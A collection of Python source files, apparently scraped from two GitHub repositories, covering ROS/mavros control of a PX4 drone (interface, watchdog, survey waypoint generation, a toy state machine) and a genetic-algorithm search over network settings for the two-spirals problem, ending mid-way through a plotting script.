metadata | text
---|---
{
"source": "joanreyero/pyx4",
"score": 2
} |
#### File: src/pyx4_base/mavros_interface.py
```python
from __future__ import division
import numpy as np
from threading import Thread, Lock
import rospy
import sys
from mavros_msgs.msg import Altitude, ExtendedState, HomePosition, State, WaypointList, OpticalFlowRad, PositionTarget
from mavros_msgs.srv import CommandBool, ParamGet, ParamSet, SetMode, WaypointClear, WaypointPush, CommandTOL, CommandHome
from geometry_msgs.msg import PoseStamped, TwistStamped
from nav_msgs.msg import Odometry
from sensor_msgs.msg import NavSatFix, Range
from std_msgs.msg import Float64, Float32
from tf.transformations import euler_from_quaternion
from definitions_pyx4 import *
from definitions_pyx4 import MAV_VTOL_STATE, LANDED_STATE, MAV_STATE
class Mavros_interface(object):
# todo - add mavros ns to topics
def __init__(self,
ros_rate=10, # slow as nothing happens in the main loop
state_estimation_mode=State_estimation_method.GPS,
enforce_height_mode_flag=False,
height_mode_req=0,
):
self.sem = state_estimation_mode
self._node_alive = True
self.ros_rate = ros_rate
self.wd_initialised = False
self.wd_fault_detected = False
self.fault_this_loop = False
# initialise data containers
self.altitude = Altitude()
self.altitude_bottom_clearance = Float32()
self.extended_state = ExtendedState()
self.global_position = NavSatFix()
self.optic_flow_raw = OpticalFlowRad()
self.optic_flow_range = Range()
self.home_position = HomePosition()
self.local_position = PoseStamped()
# self.gt_position = PoseStamped()
self.mission_wp = WaypointList()
self.state = State()
self.mocap_pose = PoseStamped()
self.camera_pose = PoseStamped()
self.camera_yaw = None
self.local_x = Float64().data
self.local_y = Float64().data
self.local_z = Float64().data
self.gt_x = Float64().data
self.gt_y = Float64().data
self.gt_z = Float64().data
# todo - we can probably live with just XX_vel_bod data?:
self.x_vel = Float64().data
self.y_vel = Float64().data
self.gt_x_vel = Float64().data
self.gt_y_vel = Float64().data
self.vel_ts = Float64().data
self.xy_vel = Float64().data
self.x_vel_bod = Float64().data
self.y_vel_bod = Float64().data
self.xy_vel_bod = Float64().data
self.body_yaw_rate = Float64().data
self.global_compass_hdg_deg = Float64().data
self.enforce_height_mode_flag = enforce_height_mode_flag
self.height_mode_req = height_mode_req
# threading locks
self.setpoint_lock = Lock() # used for setting lock in our setpoint publisher so that commands aren't mixed
# ROS services
service_timeout = 10
rospy.loginfo("Searching for mavros services")
try:
rospy.wait_for_service('mavros/param/get', service_timeout)
rospy.wait_for_service('mavros/param/set', service_timeout)
rospy.wait_for_service('mavros/cmd/arming', service_timeout)
rospy.wait_for_service('mavros/mission/push', service_timeout)
rospy.wait_for_service('mavros/mission/clear', service_timeout)
rospy.wait_for_service('mavros/set_mode', service_timeout)
rospy.wait_for_service('/mavros/cmd/set_home', service_timeout)
# rospy.wait_for_service('mavros/fcu_url', service_timeout) # todo - check how this is used in px4
self.get_param_srv = rospy.ServiceProxy('mavros/param/get', ParamGet)
self.set_param_srv = rospy.ServiceProxy('mavros/param/set', ParamSet)
self.set_arming_srv = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
self.set_mode_srv = rospy.ServiceProxy('mavros/set_mode', SetMode)
self.wp_clear_srv = rospy.ServiceProxy('mavros/mission/clear', WaypointClear)
self.wp_push_srv = rospy.ServiceProxy('mavros/mission/push', WaypointPush)
self.takeoff_srv = rospy.ServiceProxy('/mavros/cmd/takeoff', CommandTOL)
self.cmd_home_srv = rospy.ServiceProxy('/mavros/cmd/set_home', CommandHome)
rospy.loginfo("Required ROS services are up")
except rospy.ROSException:
self.shut_node_down(extended_msg="failed to connect to Mavros services - was the mavros node started?")
# make sure we have information about our connection with FCU
rospy.loginfo("Get our fcu string")
try:
self.fcu_url = rospy.get_param('mavros/fcu_url')
except Exception as e:
print (e)
self.shut_node_down(extended_msg="cant find fcu url")
# ensure that our height mode is as we expect it to be (if required)
rospy.loginfo('check height_mode {}'.format(self.enforce_height_mode_flag))
if self.enforce_height_mode_flag:
# todo - allow multiple attempts at this
# res = self.mavros_interface.get_param_srv(param)
param_read_attempts = 0
try:
while param_read_attempts < 5:
res = self.get_param_srv('EKF2_HGT_MODE')
if res.success:
self.height_mode = res.value.integer
if self.height_mode == self.height_mode_req:
rospy.loginfo('height mode {} as expected'.format(self.height_mode))
break
else:
raise Exception ("height mode is {} - (expected heightmode is {}) change parameter with QGround control and try again".format(self.height_mode, self.height_mode_req))
break
else:
rospy.logerr( "Couldn't read EKF2_HGT_MODE param on attempt {} - trying again".format(param_read_attempts))
param_read_attempts += 1
rospy.sleep(2)
except Exception as e:
rospy.logerr("Couldn't read EKF2_HGT_MODE after {} attempts - shutting down".format(param_read_attempts))
self.shut_node_down(extended_msg= "height_mode error - traceback is {}".format(e))
# todo: ensure that our state estimation parameters are as available (this requires the state estimation
# topic name so can't test this until we do something with mocap again) Actually, we can incorporate this into
# the watchdog
# if state_estimation_mode == State_estimation_method.MOCAP:
# ROS subscribers
self.alt_sub = rospy.Subscriber('mavros/altitude', Altitude, self.altitude_callback)
self.ext_state_sub = rospy.Subscriber('mavros/extended_state',ExtendedState,self.extended_state_callback)
self.global_pos_sub = rospy.Subscriber('mavros/global_position/global',NavSatFix, self.global_position_callback)
self.optic_flow_raw_sub = rospy.Subscriber('mavros/px4flow/raw/optical_flow_raw',OpticalFlowRad, self.optic_flow_raw_callback)
self.optic_flow_range_sub = rospy.Subscriber('mavros/px4flow/ground_distance',Range,self.optic_flow_range_callback)
self.home_pos_sub = rospy.Subscriber('mavros/home_position/home', HomePosition, self.home_position_callback)
self.local_pos_sub = rospy.Subscriber('mavros/local_position/pose', PoseStamped, self.local_position_callback)
self.mission_wp_sub = rospy.Subscriber('mavros/mission/waypoints', WaypointList, self.mission_wp_callback)
self.state_sub = rospy.Subscriber('mavros/state', State, self.state_callback)
self.mocap_pos_sub = rospy.Subscriber('mavros/vision_pose/pose', PoseStamped, self.mocap_pos_callback)
# self.camera_pose_sub = rospy.Subscriber(self.camera_pose_topic_name, PoseStamped, self.cam_pose_cb)
# todo - add check for this signal to watchdog - or remap /mavros/local_position/velocity -> /mavros/local_position/velocity_local
self.velocity_local_sub = rospy.Subscriber('/mavros/local_position/velocity_local', TwistStamped, self.vel_callback)
self.velocity_body_sub = rospy.Subscriber('/mavros/local_position/velocity_body', TwistStamped, self.vel_bod_callback)
self.compass_sub = rospy.Subscriber('/mavros/global_position/compass_hdg', Float64, self.compass_hdg_callback)
self.ground_truth_sub = rospy.Subscriber('/body_ground_truth', Odometry, self.gt_position_callback)
## Ros publishers
self.local_pos_pub_raw = rospy.Publisher('mavros/setpoint_raw/local', PositionTarget, queue_size=1)
# ROS topics - this must come after our ROS subscribers
topics_timeout = 30
rospy.loginfo("waiting for ROS topics")
try:
# check that essential messages are being subscribed to regularly
for _ in np.arange(2):
rospy.wait_for_message('mavros/local_position/pose', PoseStamped, topics_timeout)
rospy.wait_for_message('mavros/extended_state', ExtendedState, topics_timeout)
except rospy.ROSException:
self.shut_node_down(extended_msg="Required ros topics not published")
rospy.loginfo("ROS topics are up")
# create a watchdog thread that checks topics are being received at the expected rates
self.watchdog_thread = Thread(target=self.watchdog, args=())
self.watchdog_thread.daemon = True
self.watchdog_thread.start()
def run(self):
rate = rospy.Rate(self.ros_rate)
while not rospy.is_shutdown() and self._node_alive:
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logwarn(('Mavros interface error is :', e))
def shut_node_down(self, extended_msg=''):
self._node_alive = False
rospy.logerr('mavros interface node is shutting down ' + extended_msg)
sys.exit()
###########################################
# Frequently used properties
###########################################
@property
def yaw_local(self):
orientation_q = self.local_position.pose.orientation
(_, _, yaw) = euler_from_quaternion([orientation_q.x, orientation_q.y, orientation_q.z, orientation_q.w])
return yaw
###########################################
# ROS callback functions
###########################################
def altitude_callback(self, data):
self.altitude = data
self.altitude_bottom_clearance = data.bottom_clearance
def extended_state_callback(self, data):
if self.extended_state.vtol_state != data.vtol_state:
rospy.loginfo("VTOL state changed from {0} to {1}".format(
MAV_VTOL_STATE(self.extended_state.vtol_state).name, MAV_VTOL_STATE(data.vtol_state).name))
if self.extended_state.landed_state != data.landed_state:
rospy.loginfo("landed state changed from {0} to {1}".format(
LANDED_STATE(self.extended_state.landed_state).name, LANDED_STATE(data.landed_state).name))
self.extended_state = data
def global_position_callback(self, data):
self.global_position = data
def optic_flow_raw_callback(self, data):
self.optic_flow_raw = data
def optic_flow_range_callback(self, data):
self.optic_flow_range = data
def home_position_callback(self, data):
self.home_position = data
def local_position_callback(self, data):
self.local_position = data
self.local_x = self.local_position.pose.position.x
self.local_y = self.local_position.pose.position.y
self.local_z = self.local_position.pose.position.z
# self.local_pos = np.array((self.local_x, self.local_y, self.local_z))
def gt_position_callback(self, odom):
self.gt_x = odom.pose.pose.position.x
self.gt_y = odom.pose.pose.position.y
self.gt_z = odom.pose.pose.position.z
self.gt_x_vel = odom.twist.twist.linear.x
self.gt_y_vel = odom.twist.twist.linear.y
def mission_wp_callback(self, data):
if self.mission_wp.current_seq != data.current_seq:
rospy.loginfo("current mission waypoint sequence updated: {0}".
format(data.current_seq))
self.mission_wp = data
def state_callback(self, data):
if self.state.armed != data.armed:
rospy.loginfo("armed state changed from {0} to {1}".format(
self.state.armed, data.armed))
if self.state.connected != data.connected:
rospy.loginfo("connected changed from {0} to {1}".format(
self.state.connected, data.connected))
if self.state.mode != data.mode:
rospy.loginfo("mode changed from {0} to {1}".format(
self.state.mode, data.mode))
if self.state.system_status != data.system_status:
rospy.loginfo("system_status changed from {0} to {1}".format(
MAV_STATE(self.state.system_status).name, MAV_STATE(data.system_status).name))
self.state = data
def mocap_pos_callback(self, data):
self.mocap_pose = data
def vel_callback(self, data):
## Coordinate frame for local pos (note this is relative to a fixed frame of reference and is not in the body
# frame) to the take off point, appears to be: X: forward, Y: Left, Z: up
self.vel_ts = data.header.stamp.to_sec()
self.x_vel = data.twist.linear.x
self.y_vel = data.twist.linear.y
self.xy_vel = np.linalg.norm((data.twist.linear.x, data.twist.linear.y))
def vel_bod_callback(self, data):
## Velocity expressed in the vehicle body frame (from mavros/local_position/velocity_body),
# unlike the fixed local frame used in vel_callback above
self.x_vel_bod = data.twist.linear.x
self.y_vel_bod = data.twist.linear.y
self.xy_vel_bod = np.linalg.norm((data.twist.linear.x, data.twist.linear.y))
self.body_yaw_rate = data.twist.angular.z
def compass_hdg_callback(self, data):
self.global_compass_hdg_deg = data.data
# def cam_pose_cb(self, this_pose):
# self.camera_pose = this_pose
# self.camera_yaw = self.pose2yaw(this_pose=self.camera_pose)
def watchdog(self):
"""
Ensures that required data is (a) present and (b), once the watchdog is initialised, still arriving
periodically.
"""
# todo: consider monitoring the following topics
# gps_topics = ['global_pos', 'home_pos', 'mission_wp']
# vision_topics = ['vision_pose']
# main_topics = ['alt', 'ext_state', 'local_pos', 'state']
#
rate = rospy.Rate(0.5)
time_last_msg = rospy.get_time()
while not rospy.is_shutdown() and self._node_alive:
time_this_run = rospy.get_time()
time_delta = time_this_run - time_last_msg
time_last_msg = time_this_run
#
self.fault_this_loop = False
try:
if (self.state.header.stamp.secs + 2.5) < rospy.get_time():
rospy.logwarn(('not receiving state message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
try:
if (self.local_position.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving local position message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
################################################### Check our state estimation status
if self.sem is State_estimation_method.UNKNOWN:
#
pass
if self.sem is State_estimation_method.MOCAP:
try:
if (self.mocap_pose.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving mocap message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.sem is State_estimation_method.GPS:
try:
if (self.global_position.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn(('not receiving global position message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.sem is State_estimation_method.OPTIC_FLOW:
try:
if (self.optic_flow_raw.header.stamp.secs + 2.0) < rospy.get_time():
rospy.logwarn('optic flow stamp + 2.0 is {}, current time is {}'.format(self.optic_flow_raw.header.stamp.secs + 2.0, rospy.get_time()))
rospy.logwarn(('not receiving optic flow message with time interval ', time_delta))
self.fault_this_loop = True
except:
self.fault_this_loop = True
if self.wd_initialised and self.fault_this_loop:
self.wd_fault_detected = True
# the watchdog is initialised when all conditions are met
if not self.wd_initialised and not self.fault_this_loop:
rospy.loginfo('enabling watchdog')
self.wd_initialised = True
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
if __name__ == '__main__':
rospy.init_node('mavros_interface_node', anonymous=True, log_level=rospy.DEBUG)
# todo - add sem here if this will be used as a ros node
mri = Mavros_interface()
mri.run()
```
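The `yaw_local` property above delegates to `tf.transformations.euler_from_quaternion` to pull the heading out of the local-position quaternion. As a rough, ROS-free illustration of what that conversion does for the yaw component, here is a minimal numpy sketch (the helper name `yaw_from_quaternion` is illustrative and not part of the package):

```python
import numpy as np

def yaw_from_quaternion(x, y, z, w):
    # yaw (rotation about Z) from a quaternion, matching the usual
    # roll-pitch-yaw convention assumed when calling euler_from_quaternion
    return np.arctan2(2.0 * (w * z + x * y), 1.0 - 2.0 * (y * y + z * z))

# quaternion for a 90-degree yaw: (x, y, z, w) = (0, 0, sin(pi/4), cos(pi/4))
q = (0.0, 0.0, np.sin(np.pi / 4), np.cos(np.pi / 4))
print(np.degrees(yaw_from_quaternion(*q)))  # ~90.0
```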
#### File: src/pyx4_base/pyx4_base.py
```python
from __future__ import division
from setpoint_publisher import *
from mavros_interface import *
from definitions_pyx4 import *
from mission_states import *
from threading import Thread
from commander import *
from pyx4.msg import pyx4_state as Pyx4_msg
# todo - re-add state estimation options
# todo - create a message that is published when the flight state changes
class Pyx4_base(object):
"""
A class for controlling a px4 flight control unit via ROS (using the mavros package).
NB. Mavros must be started elsewhere for this node to initialise properly
"""
def __init__(self,
flight_instructions,
node_name='pyx4_node',
rospy_rate=2,
mavros_ns='',
state_estimation_mode=State_estimation_method.GPS,
enforce_height_mode_flag=False,
height_mode_req=0,
enforce_sem_mode_flag=False,
start_authorised=True,
):
self.node_alive = True
self.mavros_ns = mavros_ns
self._run_rate=rospy_rate
self.state_estimation_mode = state_estimation_mode
self.enforce_height_mode_flag = enforce_height_mode_flag
self.height_mode_req = height_mode_req
self.start_authorised = start_authorised
# create pyx4_base state publisher
self.pyx4_state_msg_pub = rospy.Publisher(node_name + '/pyx4_state', Pyx4_msg, queue_size=5)
self.pyx4_state_msg = Pyx4_msg()
self.pyx4_state_msg.flight_state = 'Not_set'
self.pyx4_state_msg.state_label = 'Not_set'
# get robot type - it is essential that this environment variable is set so that we know whether it's a robot
# or a simulation
try:
self.robot_type = os.environ['ROBOT_TYPE']
except Exception as e:
rospy.logerr("couldn't find mandatory environmenatal variable: 'ROBOT_TYPE' - has this been set?")
self.shut_node_down()
# start mavros interface thread
self.mavros_interface = Mavros_interface(
state_estimation_mode=self.state_estimation_mode,
enforce_height_mode_flag=self.enforce_height_mode_flag,
height_mode_req=self.height_mode_req
)
self.mavros_interface_thread = Thread(target=self.mavros_interface.run, args=())
self.mavros_interface_thread.daemon = True
self.mavros_interface_thread.start()
rospy.loginfo('Pyx4_deprecated -> Mavros interface thread initialised')
# initialise the watchdog and wait until
wait_for_watchdog_rate = rospy.Rate(1)
while not rospy.is_shutdown() and not self.mavros_interface.wd_initialised:
rospy.loginfo('[pyx4_v2]: Waiting for the pyx4_base watchdog to initialise')
# todo - report what is preventing watchdog from completing
wait_for_watchdog_rate.sleep()
rospy.loginfo('Pyx4_deprecated watchdog initialised')
# start commander thread
# todo - add commander.mission_failed state - so that calling methods know when to give up
self.commander = Commander(
flight_instructions=flight_instructions, # a list of all the flight instructions
mavros_interface_node=self.mavros_interface,
commander_parent_ref=self,
start_authorised=start_authorised,
)
self.commander_thread = Thread(target=self.commander.run, args=())
self.commander_thread.daemon = True
if start_authorised:
self.commander_thread.start()
rospy.loginfo('commander initialised')
# start setpoint publisher thread
self.sp_pub_thread = Thread(target=setpoint_publisher, args=(self.mavros_interface, self.commander))
self.sp_pub_thread.daemon = True
if start_authorised:
self.sp_pub_thread.start()
rospy.loginfo('sp pub initialised')
def publish_pyx4_state(self):
self.pyx4_state_msg.header.stamp = rospy.Time.now()
self.pyx4_state_msg_pub.publish(self.pyx4_state_msg)
def do_delayed_start(self):
"""
provides a mechanism for pyx4_base to initialise (and start mavros) without starting the commander threads
handy if other preconditions need to be waited for before starting the mission
"""
self.commander_thread.start()
rospy.loginfo('commander initialised')
self.sp_pub_thread.start()
rospy.loginfo('sp pub initialised')
def run(self):
""" Keep nodes alive until exit conditions present """
rate = rospy.Rate(self._run_rate)
while not rospy.is_shutdown() and self.commander._node_alive and self.mavros_interface._node_alive:
try:
rate.sleep()
except:
self.shut_node_down()
# todo - return true if mission successful and false if not - how to check this if the commander shuts down?
def shut_node_down(self, shutdown_message='shutting down'):
self.node_alive = False
rospy.signal_shutdown(shutdown_message)
sys.exit(1)
def fail(self, e=None):
rospy.logwarn(('Pyx4_deprecated v2 error is :', e))
if __name__ == '__main__':
node_name = 'pyx4_node'
rospy.init_node(node_name, anonymous=True, log_level=rospy.DEBUG)
flight_instructions = {0: Arming_state(timeout=90.0,), 1: Take_off_state(), 2: Landing_state()}
parser = argparse.ArgumentParser(description="This node is a ROS side mavros based state machine.")
parser.add_argument('-n', '--mavros-ns', help="ROS node namespace",
default='mavros') # JS - changed as mavros.DEFAULT_NAMESPACE doesn't seem to exist anymore - todo - is there a new enum for this?
# parser.add_argument('-f', '--mission-file', help="which mission .csv file we will use to outline our mission",
# default='basic_wpts')
# parser.add_argument('-s', '--state-estimation-type', help="which sensing modality is used for state estimation",
# default='GPS')
parser.add_argument('--enforce_hgt_mode_flag', type=bool, default=False)
parser.add_argument('--height_mode_req', type=int, default=0)
parser.add_argument('--state_estimation', type=int, default=0)
args = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
# flight_instructions = {0: Take_off_state()}
# mission_file = os.path.join(MISSION_SPECS, 'big_square.csv')
# flight_instructions = Wpts_from_csv(file_path=mission_file)
pyx4 = Pyx4_base(flight_instructions=flight_instructions,
enforce_height_mode_flag=args.enforce_hgt_mode_flag,
height_mode_req=args.height_mode_req,
)
pyx4.run()
```
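`do_delayed_start` exists so that `Pyx4_base` can be constructed (and the mavros interface brought up) before the commander and setpoint threads are released. A hedged usage sketch, assuming the package modules are importable as `pyx4_base` and `mission_states` and that a ROS master plus a mavros node are already running, as the class docstring requires:

```python
import rospy
from pyx4_base import Pyx4_base
from mission_states import Arming_state, Take_off_state, Landing_state

rospy.init_node('pyx4_delayed_node', anonymous=True)
instructions = {0: Arming_state(timeout=90.0), 1: Take_off_state(), 2: Landing_state()}

# start_authorised=False keeps the commander and setpoint publisher threads parked
pyx4 = Pyx4_base(flight_instructions=instructions, start_authorised=False)
# ... wait for any external preconditions here ...
pyx4.do_delayed_start()   # releases the commander and setpoint publisher threads
pyx4.run()
```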
#### File: src/pyx4_base/survey_mission.py
```python
from __future__ import division
import csv
import numpy as np
import ast
import argparse
from mission_states import *
from pyx4_base import Pyx4_base
from mavros_msgs.msg import PositionTarget
from warnings import warn
def Survey_mission(
mission_type='hover',
control_type='pos',
duration=30,
height=3.0,
heading=0.0,
x_length=1.0,
y_length=10.0,
x_offset=1.0,
y_offset=1.0,
width_between_runs=3.0,
z_tgt_rel=0.0,
radius=5.0,
):
'''
this mission type wasn't completed as there wasn't a good way of limiting the velocity of the waypoints while
in offboard and position control modes
Allows the user to input a simple rectangular area for surveying.
NB. PX4/QGroundControl already has a nice tool for this - here I just wanted something quick and dirty to use in my
ROS setup, which already has functions for triggering the camera
The following parameters are provided: heading, x and y parameters ...
:param file_path:
:return:
'''
warn("this mission type wasn't completed as there wasn't a good way of limiting the velocity of the waypoints while"
" in offboard and position control modes")
instructions = {}
instruction_cnt = 0
# create test grid based on x & y length specifications
x_initial = - np.ceil(y_length / 2.0)
y_initial = 0.0
qty_ys = (np.ceil(y_length / width_between_runs) * 2).astype(np.int)
# generate x positions
ys = np.arange(x_initial, -x_initial+width_between_runs, width_between_runs)
ys_all = np.empty((ys.size + ys.size,), dtype=ys.dtype)
ys_all[0::2] = ys
ys_all[1::2] = ys
# generate y positions
reps = np.int(np.ceil(qty_ys/4.))
xs_all = np.tile(np.array((y_initial, y_length, y_length, y_initial)), 10) [0:len(ys_all)]
# append home to our target
################# Common instructions -> arm & take off
instructions[instruction_cnt] = Arming_state(
timeout=90
)
instruction_cnt += 1
instructions[instruction_cnt] = Take_off_state(
# instruction_type='hold',
to_altitude_tgt=height,
yaw_type='pos',
heading_tgt_rad=heading,
timeout=30,
)
instruction_cnt += 1
################################### main loop
for x_tgt, y_tgt in zip(xs_all, ys_all):
print ('generating waypoint at {}, {} '.format(x_tgt, y_tgt))
instructions[instruction_cnt] = Waypoint_state(
timeout=duration,
state_label='Going out',
waypoint_type='pos',
xy_type='pos_with_vel',
x_setpoint=x_tgt,
y_setpoint=y_tgt,
x_vel_setpoint=1.0,
y_vel_setpoint=1.0,
z_type='pos',
z_setpoint=height,
yaw_type='pos',
yaw_setpoint=heading,
coordinate_frame=PositionTarget.FRAME_LOCAL_NED,
)
instruction_cnt = instruction_cnt + 1
################################### return to home
instructions[instruction_cnt] = Waypoint_state(
state_label='Hovering',
waypoint_type='pos',
timeout=duration,
xy_type='pos',
x_setpoint=0,
y_setpoint=0,
z_type='pos',
z_setpoint=height,
yaw_type='pos',
yaw_setpoint=heading,
coordinate_frame=PositionTarget.FRAME_LOCAL_NED,
)
instruction_cnt = instruction_cnt + 1
######################################################################################################
################################## Landing instruction ###############################################
instructions[instruction_cnt] = Landing_state()
instruction_cnt += 1
print(xs_all)
print(ys_all)
return instructions
# translate grid points based on the offset
# rotate grid points based on heading
# plot and record coordinates of way points
if __name__ == '__main__':
# parser = argparse.ArgumentParser(description="Generates a mission from a simple argument list")
#
# # # parser.add_argument('-m', '--mission_type', type=str, default='hover')
# # parser.add_argument('-m', '--mission_type',
# # type=lambda x: is_valid_option(parser, x, VALID_MISSIONS),
# # help="Checks if mission is a valid option",
# # default='hover'
# # )
# #
# # parser.add_argument('-d', '--duration', type=float, default=10.0)
# # parser.add_argument('-a', '--altitude', type=float, default=5.0)
# # parser.add_argument('--vel_cap', type=bool, default=3.0)
# #
# # parser.add_argument('-c', '--control_type',
# # type=lambda x: is_valid_option(parser, x, VALID_CONTROL_TYPES),
# # help="Checks if control type is a valid option",
# # default='pos',
# # )
#
# parser.add_argument('-x', '--x_tgt', type=float, default=3.0)
# parser.add_argument('-y', '--y_tgt', type=float, default=3.0)
# parser.add_argument('-z', '--z_tgt_rel', type=float, default=3.0)
# parser.add_argument('-r', '--radius', type=float, default=3.0)
# parser.add_argument('--heading', type=float, default=0.0)
#
# args = parser.parse_args(rospy.myargv(argv=sys.argv)[1:])
#
#
# # todo apply vel cap and warn if effected
# # todo - default duration shorter if control type is vel
flight_instructions = Survey_mission(
# mission_type=args.mission_type,
# control_type=args.control_type,
# duration=args.duration,
# height=args.altitude,
# heading=args.heading,
# # x_tgt=args.x_tgt,
# # y_tgt=args.y_tgt,
# z_tgt_rel=args.z_tgt_rel,
# radius=args.radius,
)
rospy.init_node('pyx4_survey_node', anonymous=True, log_level=rospy.DEBUG)
pyx4 = Pyx4_base(flight_instructions=flight_instructions)
pyx4.run()
flight_instructions = Survey_mission()
```
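The waypoint grid built inside `Survey_mission` is easier to see in isolation. Below is a minimal, ROS-free sketch of just the back-and-forth ("lawnmower") grid construction, mirroring the `xs_all`/`ys_all` logic above (the `survey_grid` helper name is illustrative only):

```python
import numpy as np

def survey_grid(y_length=10.0, width_between_runs=3.0):
    """Sweep lines spaced by width_between_runs, each visited at 0 and
    y_length in alternating order, so consecutive waypoints trace an S-path."""
    x_initial = -np.ceil(y_length / 2.0)
    runs = np.arange(x_initial, -x_initial + width_between_runs, width_between_runs)
    ys_all = np.repeat(runs, 2)                       # each sweep line appears twice
    xs_all = np.tile(np.array((0.0, y_length, y_length, 0.0)),
                     len(ys_all))[:len(ys_all)]       # 0, L, L, 0, 0, L, ...
    return list(zip(xs_all, ys_all))

for x_tgt, y_tgt in survey_grid():
    print('waypoint at {}, {}'.format(x_tgt, y_tgt))
```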
#### File: src/pyx4_base/transistions_test2.py
```python
from transitions import Machine
from time import sleep
from random import choice
class Passport_cam_sm(object):
def __init__(self):
self._face_okay = False
self._height_okay = False
def face_ok(self, event_data):
self._face_okay = choice([True, False])
return self._face_okay
def height_ok(self, event_data):
# tol = event_data.kwargs.pop('tol', 0.5)
self._height_okay = choice([True, False])
return self._height_okay
states = ['move2face', 'validate_face', 'open_gate']
transitions = [
{'trigger': 'check', 'source': 'move2face', 'dest': 'validate_face',
'conditions': ['height_ok', 'face_ok']},
{'trigger': 'check', 'source': 'validate_face', 'dest': 'open_gate',
'conditions': 'face_ok'}, # (1)
{'trigger': 'check', 'source': 'validate_face', 'dest': 'move2face'}, # (2)
{'trigger': 'check', 'source': 'open_gate', 'dest': 'move2face'}, # (2)
]
class Passport_cam(object):
def __init__(self):
self.model = Passport_cam_sm()
self.machine = Machine(model=self.model, states=states, transitions=transitions,
initial='move2face', send_event=True)
self.running = True
def run(self):
while self.running:
print('At state ' + self.model.state)
#while not self.model.check():
self.model.check()
sleep(1)
def camera_dynamics(self):
print("Processing...")
self.running = False
pc = Passport_cam()
pc.run()
print('Done')
``` |
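The two transitions marked (1) and (2) share the trigger `check`; the `transitions` package tries them in declaration order and falls through to the next matching transition when a condition callback returns False. A self-contained sketch of that fallback behaviour (toy class, not part of the file above):

```python
from transitions import Machine

class Gate(object):
    def __init__(self, ok):
        self.ok = ok
    def face_ok(self, event_data):          # condition callback (send_event=True)
        return self.ok

gate = Gate(ok=False)
Machine(model=gate, states=['validate_face', 'open_gate', 'move2face'],
        transitions=[
            {'trigger': 'check', 'source': 'validate_face', 'dest': 'open_gate',
             'conditions': 'face_ok'},                 # tried first
            {'trigger': 'check', 'source': 'validate_face', 'dest': 'move2face'},
        ],
        initial='validate_face', send_event=True)

gate.check()
print(gate.state)   # 'move2face', because face_ok returned False
```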
{
"source": "joanreyero/two-spirals",
"score": 3
} |
#### File: two-spirals/python/ga-two-spirals.py
```python
from modgeneticalgorithm import geneticalgorithm as ga
from fitness import get_fitness
import numpy as np
def fitness_for_test(X):
targ = 8880141
return np.sqrt((targ - sum(X)) ** 2) / targ
algorithm_param = {'max_num_iteration': 4000,
'population_size':20,
'mutation_probability':0.1,
'elit_ratio': 0.01,
'crossover_probability': 0.5,
'parents_portion': 0.3,
'crossover_type':'uniform',
'max_iteration_without_improv': 20}
"""
Genome layout (each gene corresponds to one element of the bounds arrays below, in order):
- First 6 are hidden layers with the range of hidden units
- Algorithm: [0, 1] (range 0 to 1; 0 for PSO, 1 for SGD)
- Activation: [0, 4] (0: ReLU, 1: TanH, 2: Sigmoid, 3: Sin, 4: RBF)
- Inputs: [0, 1] (whether we leave x**2 or not)
"""
varbound_ga = np.array([
[0, 8], # HL 1
[0, 8], # HL 2
[0, 8], # HL 3
[0, 0], # HL 4
[0, 0], # HL 5
[0, 0], # HL 6
[1, 1], # PSO
[1, 1], # TanH
[0, 0], # No x**2
])
varbound_gp = np.array([
[6, 6], # HL 1
[0, 0], # HL 2
[0, 0], # HL 3
[0, 0], # HL 4
[0, 0], # HL 5
[0, 0], # HL 6
[0, 1], # PSO or SGD
[0, 4], # 0: ReLU, 1: TanH, 2: Sigmoid, 3: Sin, 4: RBF
[0, 1], # x**2 or not
])
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--type', '-t', type=str, default='ga',
help='ga or gp')
parser.add_argument('--file', '-f', type=str, default='temp',
help="filename to save results")
args = parser.parse_args()
if args.type == 'ga':
varbound = varbound_ga
elif args.type == 'gp':
varbound = varbound_gp
model=ga(function=get_fitness, dimension=9, variable_type='int',variable_boundaries=varbound, algorithm_parameters=algorithm_param, function_timeout=4000, filename=args.file)
model.run()
```
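The comment block above describes how each 9-gene vector encodes a network configuration, but the actual decoding lives in `fitness.get_fitness`, which is not shown here. A purely illustrative decoder that follows the mapping stated in that comment block (note the inline `# PSO` label on the fixed algorithm gene in `varbound_ga` reads differently from that mapping):

```python
ACTIVATIONS = ['ReLU', 'TanH', 'Sigmoid', 'Sin', 'RBF']

def decode_genome(genome):
    """Turn a 9-element integer vector into a readable network description."""
    hidden = [int(h) for h in genome[:6] if h > 0]     # drop unused (0-unit) layers
    return {
        'hidden_layers': hidden,
        'algorithm': 'SGD' if genome[6] == 1 else 'PSO',
        'activation': ACTIVATIONS[int(genome[7])],
        'use_x_squared_input': bool(genome[8]),
    }

print(decode_genome([4, 6, 2, 0, 0, 0, 1, 1, 0]))
# {'hidden_layers': [4, 6, 2], 'algorithm': 'SGD', 'activation': 'TanH', 'use_x_squared_input': False}
```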
#### File: two-spirals/python/plotter.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
ITER, FITNESS, TIME = 'iter', 'best_fitness', 'time'
def plot_fitness_time(ts, f, title, save):
start_t = ts[0]
ts = [int(t - start_t) for t in ts]
plt.plot(ts, f, '-o', color='orange')
plt.xlabel('Time (s)')
plt.title('Fitness over time for a ' + title)
plt.savefig(f'figures/time-{save}.pdf')
#plt.show()
def plot_joint(ts, f, interval, title, save):
start_t = ts[0]
ts = [int(t - start_t) for t in ts]
print(int(ts[-1] - ts[0]) / 3600.0)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax2 = ax1.twiny()
ax2.grid(which='both', alpha=0.5)
ax1.plot(ts, f, '-o', color='green', markersize=3)
ax1.set_xlabel("Time (s)")
new_tick_locations = [t for i, t in enumerate(ts) if i % interval == 0]
